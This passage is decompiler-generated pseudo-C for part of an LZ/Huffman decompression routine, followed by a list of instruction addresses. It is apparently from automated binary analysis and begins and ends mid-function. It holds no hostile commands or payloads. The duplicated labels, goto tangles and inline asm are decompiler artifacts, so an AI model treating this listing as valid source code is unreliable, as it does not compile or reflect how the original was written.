												 *(_t658 + 0x18) = _t603;
												if(_t461 == 0) {
													L131:
													 *(_t638 + 0x60) = _t603;
													_t320 = E00E6A9F3(_t643);
													_t321 =  *(_t638 + 0x2de8);
													_t605 = _t320 & 0x0000fffe;
													__eflags = _t605 -  *((intOrPtr*)(_t638 + 0x2d68 + _t321 * 4));
													if(_t605 >=  *((intOrPtr*)(_t638 + 0x2d68 + _t321 * 4))) {
														L133:
														_t628 = 0xf;
														_t322 = _t321 + 1;
														__eflags = _t322 - _t628;
														if(_t322 >= _t628) {
															L139:
															_t496 =  *(_t643 + 4) + _t628;
															 *(_t643 + 4) = _t496 & 0x00000007;
															_t324 = _t496 >> 3;
															 *_t643 =  *_t643 + _t324;
															_t498 = 0x10;
															_t501 =  *((intOrPtr*)(_t638 + 0x2da8 + _t628 * 4)) + (_t605 -  *((intOrPtr*)(_t638 + 0x2d64 + _t628 * 4)) >> _t498 - _t628);
															__eflags = _t501 -  *((intOrPtr*)(_t638 + 0x2d64));
															asm("sbb eax, eax");
															_t325 = _t324 & _t501;
															__eflags = _t325;
															_t326 =  *(_t638 + 0x39ec + _t325 * 2) & 0x0000ffff;
															L140:
															_t629 = _t326 & 0x0000ffff;
															__eflags = _t629 - 8;
															if(_t629 >= 8) {
																_t464 = (_t629 >> 2) - 1;
																_t629 = (_t629 & 0x00000003 | 0x00000004) << _t464;
																__eflags = _t629;
															} else {
																_t464 = 0;
															}
															_t632 = _t629 + 2;
															__eflags = _t464;
															if(_t464 != 0) {
																_t391 = E00E6A9F3(_t643);
																_t525 = 0x10;
																_t632 = _t632 + (_t391 >> _t525 - _t464);
																_t528 =  *(_t643 + 4) + _t464;
																 *_t643 =  *_t643 + (_t528 >> 3);
																_t529 = _t528 & 0x00000007;
																__eflags = _t529;
																 *(_t643 + 4) = _t529;
															}
															__eflags =  *((char*)(_t638 + 0x4c44));
															_t608 =  *(_t658 + 0x18);
															 *(_t638 + 0x74) = _t632;
															if( *((char*)(_t638 + 0x4c44)) == 0) {
																L147:
																_t503 =  *(_t638 + 0x7c);
																_t466 = _t503 - _t608;
																_t328 =  *((intOrPtr*)(_t638 + 0xe6d8)) + 0xffffeffc;
																__eflags = _t466 - _t328;
																if(_t466 >= _t328) {
																	L158:
																	__eflags = _t632;
																	if(_t632 == 0) {
																		while(1) {
																			L0:
																			_t638 = __esi;
																			_t598 = __esi + 0x7c;
																			goto L1;
																		}
																	}
																	L159:
																	_t644 =  *(_t638 + 0xe6dc);
																	do {
																		L160:
																		_t645 = _t644 & _t466;
																		_t466 = _t466 + 1;
																		 *((char*)( *((intOrPtr*)(_t638 + 0x4b40)) +  *(_t638 + 0x7c))) =  *((intOrPtr*)( *((intOrPtr*)(_t638 + 0x4b40)) + _t645));
																		_t598 = _t638 + 0x7c;
																		_t644 =  *(_t638 + 0xe6dc);
																		 *_t598 =  *_t598 + 0x00000001 & _t644;
																		_t632 = _t632 - 1;
																		__eflags = _t632;
																	} while (_t632 != 0);
																	goto L161;
																}
																L148:
																__eflags = _t503 - _t328;
																if(_t503 >= _t328) {
																	goto L158;
																}
																L149:
																_t333 =  *((intOrPtr*)(_t638 + 0x4b40));
																_t468 = _t466 + _t333;
																_t646 = _t333 + _t503;
																 *(_t638 + 0x7c) = _t503 + _t632;
																__eflags = _t608 - _t632;
																if(_t608 >= _t632) {
																	L154:
																	__eflags = _t632 - 8;
																	if(_t632 < 8) {
																		goto L117;
																	}
																	L155:
																	_t347 = _t632 >> 3;
																	__eflags = _t347;
																	 *(_t658 + 0x18) = _t347;
																	_t639 = _t347;
																	do {
																		L156:
																		E00E7F750(_t646, _t468, 8);
																		_t658 = _t658 + 0xc;
																		_t468 = _t468 + 8;
																		_t646 = _t646 + 8;
																		_t632 = _t632 - 8;
																		_t639 = _t639 - 1;
																		__eflags = _t639;
																	} while (_t639 != 0);
																	goto L116;
																}
																L150:
																_t611 = 8;
																__eflags = _t632 - _t611;
																if(_t632 < _t611) {
																	goto L117;
																}
																L151:
																_t511 = _t632 >> 3;
																__eflags = _t511;
																do {
																	L152:
																	_t632 = _t632 - _t611;
																	 *_t646 =  *_t468;
																	 *((char*)(_t646 + 1)) =  *(_t468 + 1);
																	 *((char*)(_t646 + 2)) =  *((intOrPtr*)(_t468 + 2));
																	 *((char*)(_t646 + 3)) =  *((intOrPtr*)(_t468 + 3));
																	 *((char*)(_t646 + 4)) =  *((intOrPtr*)(_t468 + 4));
																	 *((char*)(_t646 + 5)) =  *((intOrPtr*)(_t468 + 5));
																	 *((char*)(_t646 + 6)) =  *((intOrPtr*)(_t468 + 6));
																	_t356 =  *((intOrPtr*)(_t468 + 7));
																	_t468 = _t468 + _t611;
																	 *((char*)(_t646 + 7)) = _t356;
																	_t646 = _t646 + _t611;
																	_t511 = _t511 - 1;
																	__eflags = _t511;
																} while (_t511 != 0);
																goto L117;
															} else {
																L146:
																_push( *(_t638 + 0xe6dc));
																_push(_t638 + 0x7c);
																_push(_t608);
																L71:
																_push(_t632);
																E00E72760();
																goto L0;
																do {
																	while(1) {
																		L0:
																		_t638 = __esi;
																		_t598 = __esi + 0x7c;
																		do {
																			while(1) {
																				L1:
																				 *_t598 =  *_t598 &  *(_t638 + 0xe6dc);
																				if( *_t643 <  *((intOrPtr*)(_t638 + 0x88))) {
																					goto L12;
																				} else {
																					_t637 = _t638 + 0x8c;
																				}
																				goto L3;
																			}
																			goto L103;
																		} while (_t632 == 0);
																		__eflags =  *((char*)(_t638 + 0x4c44));
																		if( *((char*)(_t638 + 0x4c44)) == 0) {
																			L106:
																			_t537 =  *(_t638 + 0x7c);
																			_t614 =  *(_t638 + 0x60);
																			_t399 =  *((intOrPtr*)(_t638 + 0xe6d8)) + 0xffffeffc;
																			_t468 = _t537 - _t614;
																			__eflags = _t468 - _t399;
																			if(_t468 >= _t399) {
																				L125:
																				__eflags = _t632;
																				if(_t632 == 0) {
																					while(1) {
																						L0:
																						_t638 = __esi;
																						_t598 = __esi + 0x7c;
																						L1:
																						 *_t598 =  *_t598 &  *(_t638 + 0xe6dc);
																						if( *_t643 <  *((intOrPtr*)(_t638 + 0x88))) {
																							goto L12;
																						} else {
																							_t637 = _t638 + 0x8c;
																						}
																					}
																				}
																				L126:
																				_t648 =  *(_t638 + 0xe6dc);
																				do {
																					L127:
																					_t649 = _t648 & _t468;
																					_t468 = _t468 + 1;
																					 *((char*)( *((intOrPtr*)(_t638 + 0x4b40)) +  *(_t638 + 0x7c))) =  *((intOrPtr*)( *((intOrPtr*)(_t638 + 0x4b40)) + _t649));
																					_t598 = _t638 + 0x7c;
																					_t648 =  *(_t638 + 0xe6dc);
																					 *_t598 =  *_t598 + 0x00000001 & _t648;
																					_t632 = _t632 - 1;
																					__eflags = _t632;
																				} while (_t632 != 0);
																				L161:
																				_t643 = _t638 + 4;
																				goto L1;
																			}
																			L107:
																			__eflags = _t537 - _t399;
																			if(_t537 >= _t399) {
																				goto L125;
																			}
																			L108:
																			_t400 =  *((intOrPtr*)(_t638 + 0x4b40));
																			_t468 = _t468 + _t400;
																			_t646 = _t400 + _t537;
																			 *(_t638 + 0x7c) = _t537 + _t632;
																			__eflags = _t614 - _t632;
																			if(_t614 >= _t632) {
																				L113:
																				__eflags = _t632 - 8;
																				if(_t632 < 8) {
																					L117:
																					_t598 = _t638 + 0x7c;
																					__eflags = _t632;
																					if(_t632 == 0) {
																						goto L161;
																					}
																					L118:
																					_t598 = _t638 + 0x7c;
																					 *_t646 =  *_t468;
																					__eflags = _t632 - 1;
																					if(_t632 <= 1) {
																						goto L161;
																					}
																					L119:
																					_t598 = _t638 + 0x7c;
																					 *((char*)(_t646 + 1)) =  *(_t468 + 1);
																					__eflags = _t632 - 2;
																					if(_t632 <= 2) {
																						goto L161;
																					}
																					L120:
																					_t598 = _t638 + 0x7c;
																					 *((char*)(_t646 + 2)) =  *((intOrPtr*)(_t468 + 2));
																					__eflags = _t632 - 3;
																					if(_t632 <= 3) {
																						goto L161;
																					}
																					L121:
																					_t598 = _t638 + 0x7c;
																					 *((char*)(_t646 + 3)) =  *((intOrPtr*)(_t468 + 3));
																					__eflags = _t632 - 4;
																					if(_t632 <= 4) {
																						goto L161;
																					}
																					L122:
																					_t598 = _t638 + 0x7c;
																					 *((char*)(_t646 + 4)) =  *((intOrPtr*)(_t468 + 4));
																					__eflags = _t632 - 5;
																					if(_t632 <= 5) {
																						goto L161;
																					}
																					L123:
																					_t598 = _t638 + 0x7c;
																					 *((char*)(_t646 + 5)) =  *((intOrPtr*)(_t468 + 5));
																					__eflags = _t632 - 6;
																					if(_t632 <= 6) {
																						goto L161;
																					}
																					L124:
																					 *((char*)(_t646 + 6)) =  *((intOrPtr*)(_t468 + 6));
																					while(1) {
																						L0:
																						_t638 = __esi;
																						_t598 = __esi + 0x7c;
																						goto L1;
																					}
																				}
																				L114:
																				_t403 = _t632 >> 3;
																				__eflags = _t403;
																				 *(_t658 + 0x18) = _t403;
																				_t641 = _t403;
																				do {
																					L115:
																					E00E7F750(_t646, _t468, 8);
																					_t658 = _t658 + 0xc;
																					_t468 = _t468 + 8;
																					_t646 = _t646 + 8;
																					_t632 = _t632 - 8;
																					_t641 = _t641 - 1;
																					__eflags = _t641;
																				} while (_t641 != 0);
																				L116:
																				_t638 =  *((intOrPtr*)(_t658 + 0x14));
																				goto L117;
																			}
																			L109:
																			_t615 = 8;
																			__eflags = _t632 - _t615;
																			if(_t632 < _t615) {
																				goto L117;
																			}
																			L110:
																			_t539 = _t632 >> 3;
																			__eflags = _t539;
																			do {
																				L111:
																				_t632 = _t632 - _t615;
																				 *_t646 =  *_t468;
																				 *((char*)(_t646 + 1)) =  *(_t468 + 1);
																				 *((char*)(_t646 + 2)) =  *((intOrPtr*)(_t468 + 2));
																				 *((char*)(_t646 + 3)) =  *((intOrPtr*)(_t468 + 3));
																				 *((char*)(_t646 + 4)) =  *((intOrPtr*)(_t468 + 4));
																				 *((char*)(_t646 + 5)) =  *((intOrPtr*)(_t468 + 5));
																				 *((char*)(_t646 + 6)) =  *((intOrPtr*)(_t468 + 6));
																				_t412 =  *((intOrPtr*)(_t468 + 7));
																				_t468 = _t468 + _t615;
																				 *((char*)(_t646 + 7)) = _t412;
																				_t646 = _t646 + _t615;
																				_t539 = _t539 - 1;
																				__eflags = _t539;
																			} while (_t539 != 0);
																			goto L117;
																		}
																		L105:
																		_push( *(_t638 + 0xe6dc));
																		_push(_t638 + 0x7c);
																		_push( *(_t638 + 0x60));
																		goto L71;
																	}
																	L98:
																	_t417 = E00E7207E(_t638, _t658 + 0x20);
																	__eflags = _t417;
																} while (_t417 != 0);
																goto L99;
															}
														}
														L134:
														_t531 = _t638 + (_t322 + 0xb5a) * 4;
														while(1) {
															L135:
															__eflags = _t605 -  *_t531;
															if(_t605 <  *_t531) {
																break;
															}
															L136:
															_t322 = _t322 + 1;
															_t531 = _t531 + 4;
															__eflags = _t322 - 0xf;
															if(_t322 < 0xf) {
																continue;
															}
															L137:
															goto L139;
														}
														L138:
														_t628 = _t322;
														goto L139;
													}
													L132:
													_t532 = 0x10;
													_t613 = _t605 >> _t532 - _t321;
													_t535 = ( *(_t613 + _t638 + 0x2dec) & 0x000000ff) +  *(_t643 + 4);
													 *_t643 =  *_t643 + (_t535 >> 3);
													 *(_t643 + 4) = _t535 & 0x00000007;
													_t326 =  *(_t638 + 0x31ec + _t613 * 2) & 0x0000ffff;
													goto L140;
												} else {
													goto L130;
												}
												do {
													L130:
													 *_t493 =  *(_t493 - 4);
													_t493 = _t493 - 4;
													_t461 = _t461 - 1;
													__eflags = _t461;
												} while (_t461 != 0);
												goto L131;
											}
											L103:
											_t632 =  *(_t638 + 0x74);
											_t598 = _t638 + 0x7c;
											__eflags = _t632;
										}
										L97:
										_push(_t658 + 0x20);
										_t414 = E00E73B93(_t638, _t643);
										__eflags = _t414;
										if(_t414 == 0) {
											goto L99;
										}
										goto L98;
									}
									L32:
									_t634 = _t460 - 0x106;
									__eflags = _t634 - 8;
									if(_t634 >= 8) {
										_t478 = (_t634 >> 2) - 1;
										_t634 = (_t634 & 0x00000003 | 0x00000004) << _t478;
										__eflags = _t634;
									} else {
										_t478 = 0;
									}
									_t632 = _t634 + 2;
									__eflags = _t478;
									if(_t478 != 0) {
										_t444 = E00E6A9F3(_t643);
										_t582 = 0x10;
										_t632 = _t632 + (_t444 >> _t582 - _t478);
										_t585 =  *(_t643 + 4) + _t478;
										 *_t643 =  *_t643 + (_t585 >> 3);
										_t586 = _t585 & 0x00000007;
										__eflags = _t586;
										 *(_t643 + 4) = _t586;
									}
									_t418 = E00E6A9F3(_t643);
									_t419 =  *(_t638 + 0x1010);
									_t617 = _t418 & 0x0000fffe;
									__eflags = _t617 -  *((intOrPtr*)(_t638 + 0xf90 + _t419 * 4));
									if(_t617 >=  *((intOrPtr*)(_t638 + 0xf90 + _t419 * 4))) {
										L39:
										_t479 = 0xf;
										_t420 = _t419 + 1;
										__eflags = _t420 - _t479;
										if(_t420 >= _t479) {
											L45:
											_t546 =  *(_t643 + 4) + _t479;
											 *(_t643 + 4) = _t546 & 0x00000007;
											_t422 = _t546 >> 3;
											 *_t643 =  *_t643 + _t422;
											_t548 = 0x10;
											_t551 =  *((intOrPtr*)(_t638 + 0xfd0 + _t479 * 4)) + (_t617 -  *((intOrPtr*)(_t638 + 0xf8c + _t479 * 4)) >> _t548 - _t479);
											__eflags = _t551 -  *((intOrPtr*)(_t638 + 0xf8c));
											asm("sbb eax, eax");
											_t423 = _t422 & _t551;
											__eflags = _t423;
											_t424 =  *(_t638 + 0x1c14 + _t423 * 2) & 0x0000ffff;
											goto L46;
										}
										L40:
										_t575 = _t638 + (_t420 + 0x3e4) * 4;
										while(1) {
											L41:
											__eflags = _t617 -  *_t575;
											if(_t617 <  *_t575) {
												break;
											}
											L42:
											_t420 = _t420 + 1;
											_t575 = _t575 + 4;
											__eflags = _t420 - 0xf;
											if(_t420 < 0xf) {
												continue;
											}
											L43:
											goto L45;
										}
										L44:
										_t479 = _t420;
										goto L45;
									} else {
										L38:
										_t576 = 0x10;
										_t625 = _t617 >> _t576 - _t419;
										_t579 = ( *(_t625 + _t638 + 0x1014) & 0x000000ff) +  *(_t643 + 4);
										 *_t643 =  *_t643 + (_t579 >> 3);
										 *(_t643 + 4) = _t579 & 0x00000007;
										_t424 =  *(_t638 + 0x1414 + _t625 * 2) & 0x0000ffff;
										L46:
										_t425 = _t424 & 0x0000ffff;
										__eflags = _t425 - 4;
										if(_t425 >= 4) {
											_t643 = (_t425 >> 1) - 1;
											_t425 = (_t425 & 0x00000001 | 0x00000002) << _t643;
											__eflags = _t425;
										} else {
											_t643 = 0;
										}
										_t428 = _t425 + 1;
										 *(_t658 + 0x18) = _t428;
										_t471 = _t428;
										 *(_t658 + 0x10) = _t471;
										__eflags = _t643;
										if(_t643 == 0) {
											L64:
											_t643 = _t638 + 4;
											goto L65;
										} else {
											L50:
											__eflags = _t643 - 4;
											if(__eflags < 0) {
												L72:
												_t359 = E00E7839A(_t638 + 4);
												_t514 = 0x20;
												_t471 = (_t359 >> _t514 - _t643) +  *(_t658 + 0x18);
												_t517 =  *(_t638 + 8) + _t643;
												 *(_t658 + 0x10) = _t471;
												_t643 = _t638 + 4;
												 *_t643 =  *_t643 + (_t517 >> 3);
												 *(_t643 + 4) = _t517 & 0x00000007;
												L65:
												__eflags = _t471 - 0x100;
												if(_t471 > 0x100) {
													_t632 = _t632 + 1;
													__eflags = _t471 - 0x2000;
													if(_t471 > 0x2000) {
														_t632 = _t632 + 1;
														__eflags = _t471 - 0x40000;
														if(_t471 > 0x40000) {
															_t632 = _t632 + 1;
															__eflags = _t632;
														}
													}
												}
												 *(_t638 + 0x6c) =  *(_t638 + 0x68);
												 *(_t638 + 0x68) =  *(_t638 + 0x64);
												 *(_t638 + 0x64) =  *(_t638 + 0x60);
												 *(_t638 + 0x60) = _t471;
												__eflags =  *((char*)(_t638 + 0x4c44));
												 *(_t638 + 0x74) = _t632;
												if( *((char*)(_t638 + 0x4c44)) == 0) {
													L73:
													_t598 = _t638 + 0x7c;
													_t519 =  *_t598;
													_t366 =  *((intOrPtr*)(_t638 + 0xe6d8)) + 0xffffeffc;
													_t651 = _t519 - _t471;
													__eflags = _t651 - _t366;
													if(_t651 >= _t366) {
														L92:
														__eflags = _t632;
														if(_t632 == 0) {
															goto L161;
														}
														L93:
														_t472 =  *(_t638 + 0xe6dc);
														do {
															L94:
															_t473 = _t472 & _t651;
															_t651 = _t651 + 1;
															 *((char*)( *((intOrPtr*)(_t638 + 0x4b40)) +  *(_t638 + 0x7c))) =  *((intOrPtr*)(_t473 +  *((intOrPtr*)(_t638 + 0x4b40))));
															_t598 = _t638 + 0x7c;
															_t472 =  *(_t638 + 0xe6dc);
															 *_t598 =  *_t598 + 0x00000001 & _t472;
															_t632 = _t632 - 1;
															__eflags = _t632;
														} while (_t632 != 0);
														goto L161;
													}
													L74:
													__eflags = _t519 - _t366;
													if(_t519 >= _t366) {
														goto L92;
													}
													L75:
													_t371 =  *((intOrPtr*)(_t638 + 0x4b40));
													_t474 = _t371 + _t651;
													_t652 = _t371 + _t519;
													 *_t598 = _t519 + _t632;
													__eflags =  *(_t658 + 0x10) - _t632;
													if( *(_t658 + 0x10) >= _t632) {
														L80:
														__eflags = _t632 - 8;
														if(_t632 < 8) {
															L84:
															__eflags = _t632;
															if(_t632 != 0) {
																 *_t652 =  *_t474;
																__eflags = _t632 - 1;
																if(_t632 > 1) {
																	 *((char*)(_t652 + 1)) =  *((intOrPtr*)(_t474 + 1));
																	__eflags = _t632 - 2;
																	if(_t632 > 2) {
																		 *((char*)(_t652 + 2)) =  *((intOrPtr*)(_t474 + 2));
																		__eflags = _t632 - 3;
																		if(_t632 > 3) {
																			 *((char*)(_t652 + 3)) =  *((intOrPtr*)(_t474 + 3));
																			__eflags = _t632 - 4;
																			if(_t632 > 4) {
																				 *((char*)(_t652 + 4)) =  *((intOrPtr*)(_t474 + 4));
																				__eflags = _t632 - 5;
																				if(_t632 > 5) {
																					 *((char*)(_t652 + 5)) =  *((intOrPtr*)(_t474 + 5));
																					__eflags = _t632 - 6;
																					if(_t632 > 6) {
																						 *((char*)(_t652 + 6)) =  *((intOrPtr*)(_t474 + 6));
																					}
																				}
																			}
																		}
																	}
																}
															}
															goto L161;
														}
														L81:
														_t381 = _t632 >> 3;
														__eflags = _t381;
														 *(_t658 + 0x18) = _t381;
														_t640 = _t381;
														do {
															L82:
															E00E7F750(_t652, _t474, 8);
															_t658 = _t658 + 0xc;
															_t474 = _t474 + 8;
															_t652 = _t652 + 8;
															_t632 = _t632 - 8;
															_t640 = _t640 - 1;
															__eflags = _t640;
														} while (_t640 != 0);
														_t638 =  *((intOrPtr*)(_t658 + 0x14));
														_t598 =  *(_t658 + 0x1c);
														goto L84;
													}
													L76:
													__eflags = _t632 - 8;
													if(_t632 < 8) {
														goto L84;
													}
													L77:
													_t522 = _t632 >> 3;
													__eflags = _t522;
													do {
														L78:
														_t632 = _t632 - 8;
														 *_t652 =  *_t474;
														 *((char*)(_t652 + 1)) =  *((intOrPtr*)(_t474 + 1));
														 *((char*)(_t652 + 2)) =  *((intOrPtr*)(_t474 + 2));
														 *((char*)(_t652 + 3)) =  *((intOrPtr*)(_t474 + 3));
														 *((char*)(_t652 + 4)) =  *((intOrPtr*)(_t474 + 4));
														 *((char*)(_t652 + 5)) =  *((intOrPtr*)(_t474 + 5));
														 *((char*)(_t652 + 6)) =  *((intOrPtr*)(_t474 + 6));
														_t390 =  *((intOrPtr*)(_t474 + 7));
														_t474 = _t474 + 8;
														 *((char*)(_t652 + 7)) = _t390;
														_t652 = _t652 + 8;
														_t522 = _t522 - 1;
														__eflags = _t522;
													} while (_t522 != 0);
													goto L84;
												} else {
													L70:
													_push( *(_t638 + 0xe6dc));
													_push(_t638 + 0x7c);
													_push(_t471);
													goto L71;
												}
											}
											L51:
											if(__eflags <= 0) {
												_t656 = _t638 + 4;
											} else {
												_t439 = E00E7839A(_t638 + 4);
												_t569 = 0x24;
												_t572 = _t643 - 4 +  *(_t638 + 8);
												_t656 = _t638 + 4;
												_t471 = (_t439 >> _t569 - _t643 << 4) +  *(_t658 + 0x18);
												 *_t656 =  *_t656 + (_t572 >> 3);
												 *(_t656 + 4) = _t572 & 0x00000007;
											}
											_t429 = E00E6A9F3(_t656);
											_t430 =  *(_t638 + 0x1efc);
											_t621 = _t429 & 0x0000fffe;
											__eflags = _t621 -  *((intOrPtr*)(_t638 + 0x1e7c + _t430 * 4));
											if(_t621 >=  *((intOrPtr*)(_t638 + 0x1e7c + _t430 * 4))) {
												L56:
												_t657 = 0xf;
												_t431 = _t430 + 1;
												__eflags = _t431 - _t657;
												if(_t431 >= _t657) {
													L62:
													_t555 =  *(_t638 + 8) + _t657;
													 *(_t638 + 8) = _t555 & 0x00000007;
													_t433 = _t555 >> 3;
													 *(_t638 + 4) =  *(_t638 + 4) + _t433;
													_t557 = 0x10;
													_t560 =  *((intOrPtr*)(_t638 + 0x1ebc + _t657 * 4)) + (_t621 -  *((intOrPtr*)(_t638 + 0x1e78 + _t657 * 4)) >> _t557 - _t657);
													__eflags = _t560 -  *((intOrPtr*)(_t638 + 0x1e78));
													asm("sbb eax, eax");
													_t434 = _t433 & _t560;
													__eflags = _t434;
													_t435 =  *(_t638 + 0x2b00 + _t434 * 2) & 0x0000ffff;
													goto L63;
												}
												L57:
												_t562 = _t638 + (_t431 + 0x79f) * 4;
												while(1) {
													L58:
													__eflags = _t621 -  *_t562;
													if(_t621 <  *_t562) {
														break;
													}
													L59:
													_t431 = _t431 + 1;
													_t562 = _t562 + 4;
													__eflags = _t431 - 0xf;
													if(_t431 < 0xf) {
														continue;
													}
													L60:
													goto L62;
												}
												L61:
												_t657 = _t431;
												goto L62;
											} else {
												L55:
												_t563 = 0x10;
												_t624 = _t621 >> _t563 - _t430;
												_t566 = ( *(_t624 + _t638 + 0x1f00) & 0x000000ff) +  *(_t656 + 4);
												 *_t656 =  *_t656 + (_t566 >> 3);
												 *(_t656 + 4) = _t566 & 0x00000007;
												_t435 =  *(_t638 + 0x2300 + _t624 * 2) & 0x0000ffff;
												L63:
												_t471 = _t471 + (_t435 & 0x0000ffff);
												__eflags = _t471;
												 *(_t658 + 0x10) = _t471;
												goto L64;
											}
										}
									}
								}
								L28:
								__eflags =  *((char*)(_t638 + 0x4c44));
								if( *((char*)(_t638 + 0x4c44)) == 0) {
									L30:
									_t598 = _t638 + 0x7c;
									 *( *((intOrPtr*)(_t638 + 0x4b40)) +  *_t598) = _t460;
									 *_t598 =  *_t598 + 1;
									continue;
								}
								L29:
								 *(_t638 + 0x7c) =  *(_t638 + 0x7c) + 1;
								 *(E00E71ECD(_t638 + 0x4b44,  *(_t638 + 0x7c))) = _t460;
								goto L0;
							}
						}
						L13:
						__eflags = _t483 -  *_t598;
						if(_t483 ==  *_t598) {
							goto L18;
						}
						L14:
						E00E74DF4(_t638);
						_t415 =  *((intOrPtr*)(_t638 + 0x4c5c));
						__eflags = _t415 -  *((intOrPtr*)(_t638 + 0x4c4c));
						if(__eflags > 0) {
							goto L100;
						}
						L15:
						if(__eflags < 0) {
							L17:
							__eflags =  *((char*)(_t638 + 0x4c50));
							if( *((char*)(_t638 + 0x4c50)) != 0) {
								L162:
								 *((char*)(_t638 + 0x4c60)) = 0;
								goto L100;
							}
							goto L18;
						}
						L16:
						_t415 =  *((intOrPtr*)(_t638 + 0x4c58));
						__eflags = _t415 -  *((intOrPtr*)(_t638 + 0x4c48));
						if(_t415 >  *((intOrPtr*)(_t638 + 0x4c48))) {
							goto L100;
						}
						goto L17;
					}
				}
			}

0x00e75eb8
0x00e75eb8
0x00e75eb8
0x00e75eb8
0x00e75eb8
0x00e75ebb
0x00e75ebb
0x00e75ec1
0x00e75ecc
0x00000000
0x00e75ece
0x00e75ece
0x00e75ece
0x00e75ed4
0x00e75ed4
0x00e75edd
0x00e75ee0
0x00000000
0x00000000
0x00e75eef
0x00e75ef6
0x00e764a1
0x00e764a3
0x00e764a8
0x00e764af
0x00e764af
0x00e75efc
0x00e75efc
0x00e75efd
0x00e75f00
0x00e75f07
0x00000000
0x00000000
0x00e75f0d
0x00e75f15
0x00e75f16
0x00e75f17
0x00e75f18
0x00e75f1f
0x00000000
0x00e75f21
0x00000000
0x00e75f21
0x00e75f1f
0x00e75f26
0x00e75f28
0x00e75f2d
0x00e75f2f
0x00000000
0x00e75f35
0x00e75f35
0x00e75f35
0x00e75f38
0x00e75f38
0x00e75f48
0x00e75f4d
0x00e75f8d
0x00e75f8f
0x00e75f96
0x00e75f9c
0x00e75fa2
0x00e75fa9
0x00e75fd5
0x00e75fd7
0x00e75fd8
0x00e75fd9
0x00e75fdb
0x00e75ff4
0x00e75ff7
0x00e75ffe
0x00e76001
0x00e76004
0x00e76010
0x00e7601c
0x00e7601e
0x00e76024
0x00e76026
0x00e76026
0x00e76028
0x00000000
0x00e75fdd
0x00e75fe0
0x00e75fe3
0x00e75fe3
0x00e75fe3
0x00e75fe5
0x00e75ff2
0x00e75ff2
0x00e75ff2
0x00e75fe7
0x00e75fe7
0x00e75fe8
0x00e75feb
0x00e75fee
0x00000000
0x00e75ff0
0x00000000
0x00e75ff0
0x00e75fee
0x00000000
0x00e75fe3
0x00e75fab
0x00e75fad
0x00e75fb0
0x00e75fba
0x00e75fc2
0x00e75fc8
0x00e75fcb
0x00e76030
0x00e76030
0x00e76036
0x00e76072
0x00e76072
0x00e76078
0x00e76474
0x00e76474
0x00e7647a
0x00e764b2
0x00e764b2
0x00e764b8
0x00e76655
0x00e76655
0x00e76655
0x00e7665e
0x00e76661
0x00e76663
0x00e76667
0x00e76676
0x00e76678
0x00e7667b
0x00e76682
0x00e76688
0x00e7668e
0x00e76695
0x00e766c1
0x00e766c3
0x00e766c4
0x00e766c5
0x00e766c7
0x00e766e3
0x00e766e6
0x00e766ed
0x00e766f0
0x00e766f3
0x00e766ff
0x00e7670b
0x00e7670d
0x00e76713
0x00e76715
0x00e76715
0x00e76717
0x00e7671f
0x00e7671f
0x00e76722
0x00e76725
0x00e76736
0x00e76739
0x00e76739
0x00e76727
0x00e76727
0x00e76727
0x00e7673b
0x00e7673e
0x00e76740
0x00e76744
0x00e7674b
0x00e76753
0x00e76755
0x00e7675c
0x00e7675f
0x00e7675f
0x00e76762
0x00e76762
0x00e76765
0x00e7676c
0x00e76770
0x00e76773
0x00e76785
0x00e76785
0x00e76790
0x00e76792
0x00e76797
0x00e76799
0x00e7683e
0x00e7683e
0x00e76840
0x00e75eb8
0x00e75eb8
0x00e75eb8
0x00e75eb8
0x00000000
0x00e75eb8
0x00e75eb8
0x00e76846
0x00e76846
0x00e7684c
0x00e7684c
0x00e76852
0x00e76857
0x00e7685b
0x00e7685e
0x00e76863
0x00e7686c
0x00e7686e
0x00e7686e
0x00e7686e
0x00000000
0x00e7684c
0x00e7679f
0x00e7679f
0x00e767a1
0x00000000
0x00000000
0x00e767a7
0x00e767a7
0x00e767ad
0x00e767af
0x00e767b5
0x00e767b8
0x00e767ba
0x00e7680b
0x00e7680b
0x00e7680e
0x00000000
0x00000000
0x00e76814
0x00e76816
0x00e76816
0x00e76819
0x00e7681d
0x00e7681f
0x00e7681f
0x00e76823
0x00e76828
0x00e7682b
0x00e7682e
0x00e76831
0x00e76834
0x00e76834
0x00e76834
0x00000000
0x00e76839
0x00e767bc
0x00e767be
0x00e767bf
0x00e767c1
0x00000000
0x00000000
0x00e767c7
0x00e767c9
0x00e767c9
0x00e767cc
0x00e767cc
0x00e767ce
0x00e767d0
0x00e767d6
0x00e767dc
0x00e767e2
0x00e767e8
0x00e767ee
0x00e767f4
0x00e767f7
0x00e767fa
0x00e767fc
0x00e767ff
0x00e76801
0x00e76801
0x00e76801
0x00000000
0x00e76775
0x00e76775
0x00e76775
0x00e7677e
0x00e7677f
0x00e762d3
0x00e762d3
0x00e762da
0x00e762df
0x00e75eb8
0x00e75eb8
0x00e75eb8
0x00e75eb8
0x00e75eb8
0x00e75ebb
0x00e75ebb
0x00e75ebb
0x00e75ec1
0x00e75ecc
0x00000000
0x00e75ece
0x00e75ece
0x00e75ece
0x00000000
0x00e75ecc
0x00000000
0x00e75ebb
0x00e764cc
0x00e764d3
0x00e764e7
0x00e764e7
0x00e764f2
0x00e764f5
0x00e764fa
0x00e764fc
0x00e764fe
0x00e7661b
0x00e7661b
0x00e7661d
0x00e75eb8
0x00e75eb8
0x00e75eb8
0x00e75eb8
0x00e75ebb
0x00e75ec1
0x00e75ecc
0x00000000
0x00e75ece
0x00e75ece
0x00e75ece
0x00e75ecc
0x00e75eb8
0x00e76623
0x00e76623
0x00e76629
0x00e76629
0x00e7662f
0x00e76634
0x00e76638
0x00e7663b
0x00e76640
0x00e76649
0x00e7664b
0x00e7664b
0x00e7664b
0x00e76873
0x00e76873
0x00000000
0x00e76873
0x00e76504
0x00e76504
0x00e76506
0x00000000
0x00000000
0x00e7650c
0x00e7650c
0x00e76512
0x00e76514
0x00e7651a
0x00e7651d
0x00e7651f
0x00e76569
0x00e76569
0x00e7656c
0x00e76597
0x00e76597
0x00e7659a
0x00e7659c
0x00000000
0x00000000
0x00e765a2
0x00e765a4
0x00e765a7
0x00e765aa
0x00e765ad
0x00000000
0x00000000
0x00e765b3
0x00e765b6
0x00e765b9
0x00e765bc
0x00e765bf
0x00000000
0x00000000
0x00e765c5
0x00e765c8
0x00e765cb
0x00e765ce
0x00e765d1
0x00000000
0x00000000
0x00e765d7
0x00e765da
0x00e765dd
0x00e765e0
0x00e765e3
0x00000000
0x00000000
0x00e765e9
0x00e765ec
0x00e765ef
0x00e765f2
0x00e765f5
0x00000000
0x00000000
0x00e765fb
0x00e765fe
